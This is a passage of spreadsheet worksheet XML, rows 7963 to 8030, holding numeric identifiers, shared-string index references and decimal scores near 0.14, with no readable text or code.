        <v>7374</v>
      </c>
      <c r="F7963" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7964" ht="15.75" customHeight="1">
      <c r="A7964" s="1">
        <v>25036.0</v>
      </c>
      <c r="B7964" s="2">
        <v>1.2829767E7</v>
      </c>
      <c r="C7964" s="2" t="s">
        <v>7566</v>
      </c>
      <c r="D7964" s="2">
        <v>1.0</v>
      </c>
      <c r="E7964" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7964" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7965" ht="15.75" customHeight="1">
      <c r="A7965" s="1">
        <v>29359.0</v>
      </c>
      <c r="B7965" s="2">
        <v>3.1649546E7</v>
      </c>
      <c r="C7965" s="2" t="s">
        <v>7565</v>
      </c>
      <c r="D7965" s="2">
        <v>1.0</v>
      </c>
      <c r="E7965" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7965" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="7966" ht="15.75" customHeight="1">
      <c r="A7966" s="1">
        <v>8284.0</v>
      </c>
      <c r="B7966" s="2">
        <v>5.3492542E7</v>
      </c>
      <c r="C7966" s="2" t="s">
        <v>7567</v>
      </c>
      <c r="D7966" s="2">
        <v>1.0</v>
      </c>
      <c r="E7966" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7966" s="2">
        <v>0.1479076479076479</v>
      </c>
    </row>
    <row r="7967" ht="15.75" customHeight="1">
      <c r="A7967" s="1">
        <v>30609.0</v>
      </c>
      <c r="B7967" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C7967" s="2" t="s">
        <v>7568</v>
      </c>
      <c r="D7967" s="2">
        <v>1.0</v>
      </c>
      <c r="E7967" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7967" s="2">
        <v>0.1479076479076479</v>
      </c>
    </row>
    <row r="7968" ht="15.75" customHeight="1">
      <c r="A7968" s="1">
        <v>21068.0</v>
      </c>
      <c r="B7968" s="2">
        <v>1.7883472E7</v>
      </c>
      <c r="C7968" s="2" t="s">
        <v>7569</v>
      </c>
      <c r="D7968" s="2">
        <v>1.0</v>
      </c>
      <c r="E7968" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7968" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="7969" ht="15.75" customHeight="1">
      <c r="A7969" s="1">
        <v>22166.0</v>
      </c>
      <c r="B7969" s="2">
        <v>3.1522693E7</v>
      </c>
      <c r="C7969" s="2" t="s">
        <v>7570</v>
      </c>
      <c r="D7969" s="2">
        <v>1.0</v>
      </c>
      <c r="E7969" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7969" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="7970" ht="15.75" customHeight="1">
      <c r="A7970" s="1">
        <v>30375.0</v>
      </c>
      <c r="B7970" s="2">
        <v>3.8479012E7</v>
      </c>
      <c r="C7970" s="2" t="s">
        <v>7571</v>
      </c>
      <c r="D7970" s="2">
        <v>1.0</v>
      </c>
      <c r="E7970" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7970" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="7971" ht="15.75" customHeight="1">
      <c r="A7971" s="1">
        <v>32250.0</v>
      </c>
      <c r="B7971" s="2">
        <v>5.5083834E7</v>
      </c>
      <c r="C7971" s="2" t="s">
        <v>7572</v>
      </c>
      <c r="D7971" s="2">
        <v>1.0</v>
      </c>
      <c r="E7971" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7971" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="7972" ht="15.75" customHeight="1">
      <c r="A7972" s="1">
        <v>2645.0</v>
      </c>
      <c r="B7972" s="2">
        <v>3.4656789E7</v>
      </c>
      <c r="C7972" s="2" t="s">
        <v>7573</v>
      </c>
      <c r="D7972" s="2">
        <v>1.0</v>
      </c>
      <c r="E7972" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7972" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="7973" ht="15.75" customHeight="1">
      <c r="A7973" s="1">
        <v>12644.0</v>
      </c>
      <c r="B7973" s="2">
        <v>3.0373775E7</v>
      </c>
      <c r="C7973" s="2" t="s">
        <v>7574</v>
      </c>
      <c r="D7973" s="2">
        <v>1.0</v>
      </c>
      <c r="E7973" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7973" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="7974" ht="15.75" customHeight="1">
      <c r="A7974" s="1">
        <v>27771.0</v>
      </c>
      <c r="B7974" s="2">
        <v>2.3112926E7</v>
      </c>
      <c r="C7974" s="2" t="s">
        <v>7575</v>
      </c>
      <c r="D7974" s="2">
        <v>1.0</v>
      </c>
      <c r="E7974" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7974" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="7975" ht="15.75" customHeight="1">
      <c r="A7975" s="1">
        <v>29353.0</v>
      </c>
      <c r="B7975" s="2">
        <v>3.1522692E7</v>
      </c>
      <c r="C7975" s="2" t="s">
        <v>7570</v>
      </c>
      <c r="D7975" s="2">
        <v>1.0</v>
      </c>
      <c r="E7975" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7975" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="7976" ht="15.75" customHeight="1">
      <c r="A7976" s="1">
        <v>31506.0</v>
      </c>
      <c r="B7976" s="2">
        <v>5070735.0</v>
      </c>
      <c r="C7976" s="2" t="s">
        <v>7576</v>
      </c>
      <c r="D7976" s="2">
        <v>1.0</v>
      </c>
      <c r="E7976" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7976" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="7977" ht="15.75" customHeight="1">
      <c r="A7977" s="1">
        <v>22616.0</v>
      </c>
      <c r="B7977" s="2">
        <v>4.0004256E7</v>
      </c>
      <c r="C7977" s="2" t="s">
        <v>7577</v>
      </c>
      <c r="D7977" s="2">
        <v>1.0</v>
      </c>
      <c r="E7977" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7977" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="7978" ht="15.75" customHeight="1">
      <c r="A7978" s="1">
        <v>23981.0</v>
      </c>
      <c r="B7978" s="2">
        <v>9115542.0</v>
      </c>
      <c r="C7978" s="2" t="s">
        <v>7578</v>
      </c>
      <c r="D7978" s="2">
        <v>1.0</v>
      </c>
      <c r="E7978" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7978" s="2">
        <v>0.1473429951690822</v>
      </c>
    </row>
    <row r="7979" ht="15.75" customHeight="1">
      <c r="A7979" s="1">
        <v>1311.0</v>
      </c>
      <c r="B7979" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C7979" s="2" t="s">
        <v>7579</v>
      </c>
      <c r="D7979" s="2">
        <v>1.0</v>
      </c>
      <c r="E7979" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7979" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="7980" ht="15.75" customHeight="1">
      <c r="A7980" s="1">
        <v>4526.0</v>
      </c>
      <c r="B7980" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C7980" s="2" t="s">
        <v>7580</v>
      </c>
      <c r="D7980" s="2">
        <v>1.0</v>
      </c>
      <c r="E7980" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7980" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="7981" ht="15.75" customHeight="1">
      <c r="A7981" s="1">
        <v>11356.0</v>
      </c>
      <c r="B7981" s="2">
        <v>2.1324313E7</v>
      </c>
      <c r="C7981" s="2" t="s">
        <v>7581</v>
      </c>
      <c r="D7981" s="2">
        <v>1.0</v>
      </c>
      <c r="E7981" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7981" s="2">
        <v>0.1465517241379311</v>
      </c>
    </row>
    <row r="7982" ht="15.75" customHeight="1">
      <c r="A7982" s="1">
        <v>2498.0</v>
      </c>
      <c r="B7982" s="2">
        <v>3.3933062E7</v>
      </c>
      <c r="C7982" s="2" t="s">
        <v>7582</v>
      </c>
      <c r="D7982" s="2">
        <v>1.0</v>
      </c>
      <c r="E7982" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7982" s="2">
        <v>0.146551724137931</v>
      </c>
    </row>
    <row r="7983" ht="15.75" customHeight="1">
      <c r="A7983" s="1">
        <v>3153.0</v>
      </c>
      <c r="B7983" s="2">
        <v>3.6995865E7</v>
      </c>
      <c r="C7983" s="2" t="s">
        <v>7583</v>
      </c>
      <c r="D7983" s="2">
        <v>1.0</v>
      </c>
      <c r="E7983" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7983" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="7984" ht="15.75" customHeight="1">
      <c r="A7984" s="1">
        <v>5030.0</v>
      </c>
      <c r="B7984" s="2">
        <v>4.4256334E7</v>
      </c>
      <c r="C7984" s="2" t="s">
        <v>7584</v>
      </c>
      <c r="D7984" s="2">
        <v>1.0</v>
      </c>
      <c r="E7984" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7984" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="7985" ht="15.75" customHeight="1">
      <c r="A7985" s="1">
        <v>5480.0</v>
      </c>
      <c r="B7985" s="2">
        <v>4.5726974E7</v>
      </c>
      <c r="C7985" s="2" t="s">
        <v>7585</v>
      </c>
      <c r="D7985" s="2">
        <v>1.0</v>
      </c>
      <c r="E7985" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7985" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="7986" ht="15.75" customHeight="1">
      <c r="A7986" s="1">
        <v>6116.0</v>
      </c>
      <c r="B7986" s="2">
        <v>4.7772909E7</v>
      </c>
      <c r="C7986" s="2" t="s">
        <v>7586</v>
      </c>
      <c r="D7986" s="2">
        <v>1.0</v>
      </c>
      <c r="E7986" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7986" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="7987" ht="15.75" customHeight="1">
      <c r="A7987" s="1">
        <v>8423.0</v>
      </c>
      <c r="B7987" s="2">
        <v>5.392953E7</v>
      </c>
      <c r="C7987" s="2" t="s">
        <v>7587</v>
      </c>
      <c r="D7987" s="2">
        <v>1.0</v>
      </c>
      <c r="E7987" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7987" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="7988" ht="15.75" customHeight="1">
      <c r="A7988" s="1">
        <v>22902.0</v>
      </c>
      <c r="B7988" s="2">
        <v>4.8091871E7</v>
      </c>
      <c r="C7988" s="2" t="s">
        <v>7588</v>
      </c>
      <c r="D7988" s="2">
        <v>1.0</v>
      </c>
      <c r="E7988" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7988" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="7989" ht="15.75" customHeight="1">
      <c r="A7989" s="1">
        <v>141.0</v>
      </c>
      <c r="B7989" s="2">
        <v>1.3579503E7</v>
      </c>
      <c r="C7989" s="2" t="s">
        <v>7589</v>
      </c>
      <c r="D7989" s="2">
        <v>1.0</v>
      </c>
      <c r="E7989" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7989" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7990" ht="15.75" customHeight="1">
      <c r="A7990" s="1">
        <v>4546.0</v>
      </c>
      <c r="B7990" s="2">
        <v>4.2677749E7</v>
      </c>
      <c r="C7990" s="2" t="s">
        <v>7590</v>
      </c>
      <c r="D7990" s="2">
        <v>1.0</v>
      </c>
      <c r="E7990" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7990" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7991" ht="15.75" customHeight="1">
      <c r="A7991" s="1">
        <v>5804.0</v>
      </c>
      <c r="B7991" s="2">
        <v>4.6791021E7</v>
      </c>
      <c r="C7991" s="2" t="s">
        <v>7591</v>
      </c>
      <c r="D7991" s="2">
        <v>1.0</v>
      </c>
      <c r="E7991" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7991" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7992" ht="15.75" customHeight="1">
      <c r="A7992" s="1">
        <v>5929.0</v>
      </c>
      <c r="B7992" s="2">
        <v>4.7242562E7</v>
      </c>
      <c r="C7992" s="2" t="s">
        <v>7592</v>
      </c>
      <c r="D7992" s="2">
        <v>1.0</v>
      </c>
      <c r="E7992" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7992" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7993" ht="15.75" customHeight="1">
      <c r="A7993" s="1">
        <v>10701.0</v>
      </c>
      <c r="B7993" s="2">
        <v>1.4866878E7</v>
      </c>
      <c r="C7993" s="2" t="s">
        <v>7593</v>
      </c>
      <c r="D7993" s="2">
        <v>1.0</v>
      </c>
      <c r="E7993" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7993" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7994" ht="15.75" customHeight="1">
      <c r="A7994" s="1">
        <v>24901.0</v>
      </c>
      <c r="B7994" s="2">
        <v>1.2308538E7</v>
      </c>
      <c r="C7994" s="2" t="s">
        <v>7594</v>
      </c>
      <c r="D7994" s="2">
        <v>1.0</v>
      </c>
      <c r="E7994" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7994" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7995" ht="15.75" customHeight="1">
      <c r="A7995" s="1">
        <v>31591.0</v>
      </c>
      <c r="B7995" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C7995" s="2" t="s">
        <v>7595</v>
      </c>
      <c r="D7995" s="2">
        <v>1.0</v>
      </c>
      <c r="E7995" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7995" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="7996" ht="15.75" customHeight="1">
      <c r="A7996" s="1">
        <v>17415.0</v>
      </c>
      <c r="B7996" s="2">
        <v>4.968871E7</v>
      </c>
      <c r="C7996" s="2" t="s">
        <v>7596</v>
      </c>
      <c r="D7996" s="2">
        <v>1.0</v>
      </c>
      <c r="E7996" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7996" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="7997" ht="15.75" customHeight="1">
      <c r="A7997" s="1">
        <v>17618.0</v>
      </c>
      <c r="B7997" s="2">
        <v>5.0364283E7</v>
      </c>
      <c r="C7997" s="2" t="s">
        <v>7597</v>
      </c>
      <c r="D7997" s="2">
        <v>1.0</v>
      </c>
      <c r="E7997" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7997" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="7998" ht="15.75" customHeight="1">
      <c r="A7998" s="1">
        <v>24679.0</v>
      </c>
      <c r="B7998" s="2">
        <v>1.1584825E7</v>
      </c>
      <c r="C7998" s="2" t="s">
        <v>7598</v>
      </c>
      <c r="D7998" s="2">
        <v>1.0</v>
      </c>
      <c r="E7998" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7998" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="7999" ht="15.75" customHeight="1">
      <c r="A7999" s="1">
        <v>33675.0</v>
      </c>
      <c r="B7999" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C7999" s="2" t="s">
        <v>7599</v>
      </c>
      <c r="D7999" s="2">
        <v>1.0</v>
      </c>
      <c r="E7999" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7999" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="8000" ht="15.75" customHeight="1">
      <c r="A8000" s="1">
        <v>577.0</v>
      </c>
      <c r="B8000" s="2">
        <v>1.910587E7</v>
      </c>
      <c r="C8000" s="2" t="s">
        <v>7600</v>
      </c>
      <c r="D8000" s="2">
        <v>1.0</v>
      </c>
      <c r="E8000" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8000" s="2">
        <v>0.1453576864535769</v>
      </c>
    </row>
    <row r="8001" ht="15.75" customHeight="1">
      <c r="A8001" s="1">
        <v>5088.0</v>
      </c>
      <c r="B8001" s="2">
        <v>4.4483401E7</v>
      </c>
      <c r="C8001" s="2" t="s">
        <v>7601</v>
      </c>
      <c r="D8001" s="2">
        <v>1.0</v>
      </c>
      <c r="E8001" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8001" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="8002" ht="15.75" customHeight="1">
      <c r="A8002" s="1">
        <v>19848.0</v>
      </c>
      <c r="B8002" s="2">
        <v>5.7098826E7</v>
      </c>
      <c r="C8002" s="5" t="s">
        <v>7602</v>
      </c>
      <c r="D8002" s="2">
        <v>1.0</v>
      </c>
      <c r="E8002" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8002" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="8003" ht="15.75" customHeight="1">
      <c r="A8003" s="1">
        <v>32399.0</v>
      </c>
      <c r="B8003" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C8003" s="2" t="s">
        <v>7603</v>
      </c>
      <c r="D8003" s="2">
        <v>1.0</v>
      </c>
      <c r="E8003" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8003" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="8004" ht="15.75" customHeight="1">
      <c r="A8004" s="1">
        <v>3041.0</v>
      </c>
      <c r="B8004" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C8004" s="2" t="s">
        <v>7604</v>
      </c>
      <c r="D8004" s="2">
        <v>1.0</v>
      </c>
      <c r="E8004" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8004" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="8005" ht="15.75" customHeight="1">
      <c r="A8005" s="1">
        <v>3408.0</v>
      </c>
      <c r="B8005" s="2">
        <v>3.804975E7</v>
      </c>
      <c r="C8005" s="2" t="s">
        <v>7605</v>
      </c>
      <c r="D8005" s="2">
        <v>1.0</v>
      </c>
      <c r="E8005" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8005" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="8006" ht="15.75" customHeight="1">
      <c r="A8006" s="1">
        <v>5239.0</v>
      </c>
      <c r="B8006" s="2">
        <v>4.5023151E7</v>
      </c>
      <c r="C8006" s="2" t="s">
        <v>7606</v>
      </c>
      <c r="D8006" s="2">
        <v>1.0</v>
      </c>
      <c r="E8006" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8006" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="8007" ht="15.75" customHeight="1">
      <c r="A8007" s="1">
        <v>1157.0</v>
      </c>
      <c r="B8007" s="2">
        <v>2.4469445E7</v>
      </c>
      <c r="C8007" s="2" t="s">
        <v>7607</v>
      </c>
      <c r="D8007" s="2">
        <v>1.0</v>
      </c>
      <c r="E8007" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8007" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="8008" ht="15.75" customHeight="1">
      <c r="A8008" s="1">
        <v>470.0</v>
      </c>
      <c r="B8008" s="2">
        <v>1.7391449E7</v>
      </c>
      <c r="C8008" s="2" t="s">
        <v>7608</v>
      </c>
      <c r="D8008" s="2">
        <v>1.0</v>
      </c>
      <c r="E8008" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8008" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="8009" ht="15.75" customHeight="1">
      <c r="A8009" s="1">
        <v>18335.0</v>
      </c>
      <c r="B8009" s="2">
        <v>5.2419016E7</v>
      </c>
      <c r="C8009" s="2" t="s">
        <v>7609</v>
      </c>
      <c r="D8009" s="2">
        <v>1.0</v>
      </c>
      <c r="E8009" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8009" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="8010" ht="15.75" customHeight="1">
      <c r="A8010" s="1">
        <v>13967.0</v>
      </c>
      <c r="B8010" s="2">
        <v>3.731463E7</v>
      </c>
      <c r="C8010" s="2" t="s">
        <v>7610</v>
      </c>
      <c r="D8010" s="2">
        <v>1.0</v>
      </c>
      <c r="E8010" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8010" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="8011" ht="15.75" customHeight="1">
      <c r="A8011" s="1">
        <v>1443.0</v>
      </c>
      <c r="B8011" s="2">
        <v>2.6722564E7</v>
      </c>
      <c r="C8011" s="2" t="s">
        <v>7611</v>
      </c>
      <c r="D8011" s="2">
        <v>1.0</v>
      </c>
      <c r="E8011" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8011" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8012" ht="15.75" customHeight="1">
      <c r="A8012" s="1">
        <v>21513.0</v>
      </c>
      <c r="B8012" s="2">
        <v>2.3153616E7</v>
      </c>
      <c r="C8012" s="2" t="s">
        <v>7612</v>
      </c>
      <c r="D8012" s="2">
        <v>1.0</v>
      </c>
      <c r="E8012" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8012" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8013" ht="15.75" customHeight="1">
      <c r="A8013" s="1">
        <v>22779.0</v>
      </c>
      <c r="B8013" s="2">
        <v>4.5236259E7</v>
      </c>
      <c r="C8013" s="2" t="s">
        <v>7613</v>
      </c>
      <c r="D8013" s="2">
        <v>1.0</v>
      </c>
      <c r="E8013" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8013" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8014" ht="15.75" customHeight="1">
      <c r="A8014" s="1">
        <v>22952.0</v>
      </c>
      <c r="B8014" s="2">
        <v>4.8982179E7</v>
      </c>
      <c r="C8014" s="2" t="s">
        <v>7614</v>
      </c>
      <c r="D8014" s="2">
        <v>1.0</v>
      </c>
      <c r="E8014" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8014" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8015" ht="15.75" customHeight="1">
      <c r="A8015" s="1">
        <v>27797.0</v>
      </c>
      <c r="B8015" s="2">
        <v>2.3153615E7</v>
      </c>
      <c r="C8015" s="2" t="s">
        <v>7612</v>
      </c>
      <c r="D8015" s="2">
        <v>1.0</v>
      </c>
      <c r="E8015" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8015" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8016" ht="15.75" customHeight="1">
      <c r="A8016" s="1">
        <v>30500.0</v>
      </c>
      <c r="B8016" s="2">
        <v>4.0004255E7</v>
      </c>
      <c r="C8016" s="2" t="s">
        <v>7577</v>
      </c>
      <c r="D8016" s="2">
        <v>1.0</v>
      </c>
      <c r="E8016" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8016" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="8017" ht="15.75" customHeight="1">
      <c r="A8017" s="1">
        <v>9042.0</v>
      </c>
      <c r="B8017" s="2">
        <v>5.5053027E7</v>
      </c>
      <c r="C8017" s="2" t="s">
        <v>7615</v>
      </c>
      <c r="D8017" s="2">
        <v>1.0</v>
      </c>
      <c r="E8017" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8017" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="8018" ht="15.75" customHeight="1">
      <c r="A8018" s="1">
        <v>25039.0</v>
      </c>
      <c r="B8018" s="2">
        <v>1.2845486E7</v>
      </c>
      <c r="C8018" s="2" t="s">
        <v>7616</v>
      </c>
      <c r="D8018" s="2">
        <v>1.0</v>
      </c>
      <c r="E8018" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8018" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="8019" ht="15.75" customHeight="1">
      <c r="A8019" s="1">
        <v>12861.0</v>
      </c>
      <c r="B8019" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C8019" s="2" t="s">
        <v>7617</v>
      </c>
      <c r="D8019" s="2">
        <v>1.0</v>
      </c>
      <c r="E8019" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8019" s="2">
        <v>0.1436507936507937</v>
      </c>
    </row>
    <row r="8020" ht="15.75" customHeight="1">
      <c r="A8020" s="1">
        <v>885.0</v>
      </c>
      <c r="B8020" s="2">
        <v>2.2011232E7</v>
      </c>
      <c r="C8020" s="2" t="s">
        <v>7618</v>
      </c>
      <c r="D8020" s="2">
        <v>1.0</v>
      </c>
      <c r="E8020" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8020" s="2">
        <v>0.1433933933933935</v>
      </c>
    </row>
    <row r="8021" ht="15.75" customHeight="1">
      <c r="A8021" s="1">
        <v>3257.0</v>
      </c>
      <c r="B8021" s="2">
        <v>3.7427182E7</v>
      </c>
      <c r="C8021" s="2" t="s">
        <v>7619</v>
      </c>
      <c r="D8021" s="2">
        <v>1.0</v>
      </c>
      <c r="E8021" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8021" s="2">
        <v>0.1433470507544582</v>
      </c>
    </row>
    <row r="8022" ht="15.75" customHeight="1">
      <c r="A8022" s="1">
        <v>3508.0</v>
      </c>
      <c r="B8022" s="2">
        <v>3.8543758E7</v>
      </c>
      <c r="C8022" s="2" t="s">
        <v>7620</v>
      </c>
      <c r="D8022" s="2">
        <v>1.0</v>
      </c>
      <c r="E8022" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8022" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8023" ht="15.75" customHeight="1">
      <c r="A8023" s="1">
        <v>12780.0</v>
      </c>
      <c r="B8023" s="2">
        <v>3.1341196E7</v>
      </c>
      <c r="C8023" s="2" t="s">
        <v>7621</v>
      </c>
      <c r="D8023" s="2">
        <v>1.0</v>
      </c>
      <c r="E8023" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8023" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8024" ht="15.75" customHeight="1">
      <c r="A8024" s="1">
        <v>13737.0</v>
      </c>
      <c r="B8024" s="2">
        <v>3.6428651E7</v>
      </c>
      <c r="C8024" s="2" t="s">
        <v>7622</v>
      </c>
      <c r="D8024" s="2">
        <v>1.0</v>
      </c>
      <c r="E8024" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8024" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8025" ht="15.75" customHeight="1">
      <c r="A8025" s="1">
        <v>13918.0</v>
      </c>
      <c r="B8025" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C8025" s="2" t="s">
        <v>7623</v>
      </c>
      <c r="D8025" s="2">
        <v>1.0</v>
      </c>
      <c r="E8025" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8025" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8026" ht="15.75" customHeight="1">
      <c r="A8026" s="1">
        <v>21915.0</v>
      </c>
      <c r="B8026" s="2">
        <v>2.8182796E7</v>
      </c>
      <c r="C8026" s="2" t="s">
        <v>7624</v>
      </c>
      <c r="D8026" s="2">
        <v>1.0</v>
      </c>
      <c r="E8026" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8026" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8027" ht="15.75" customHeight="1">
      <c r="A8027" s="1">
        <v>25228.0</v>
      </c>
      <c r="B8027" s="2">
        <v>1.3333238E7</v>
      </c>
      <c r="C8027" s="2" t="s">
        <v>7625</v>
      </c>
      <c r="D8027" s="2">
        <v>1.0</v>
      </c>
      <c r="E8027" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8027" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8028" ht="15.75" customHeight="1">
      <c r="A8028" s="1">
        <v>25465.0</v>
      </c>
      <c r="B8028" s="2">
        <v>1.3986107E7</v>
      </c>
      <c r="C8028" s="2" t="s">
        <v>7626</v>
      </c>
      <c r="D8028" s="2">
        <v>1.0</v>
      </c>
      <c r="E8028" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8028" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8029" ht="15.75" customHeight="1">
      <c r="A8029" s="1">
        <v>25515.0</v>
      </c>
      <c r="B8029" s="2">
        <v>1.4176573E7</v>
      </c>
      <c r="C8029" s="2" t="s">
        <v>7534</v>
      </c>
      <c r="D8029" s="2">
        <v>1.0</v>
      </c>
      <c r="E8029" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8029" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="8030" ht="15.75" customHeight="1">
      <c r="A8030" s="1">
        <v>27454.0</v>
      </c>
      <c r="B8030" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C8030" s="2" t="s">
        <v>7627</v>
      </c>
      <c r="D8030" s="2">
        <v>1.0</v>
      </c>
      <c r="E8030" s="3" t="s">
        <v>7374</v>
      </c>
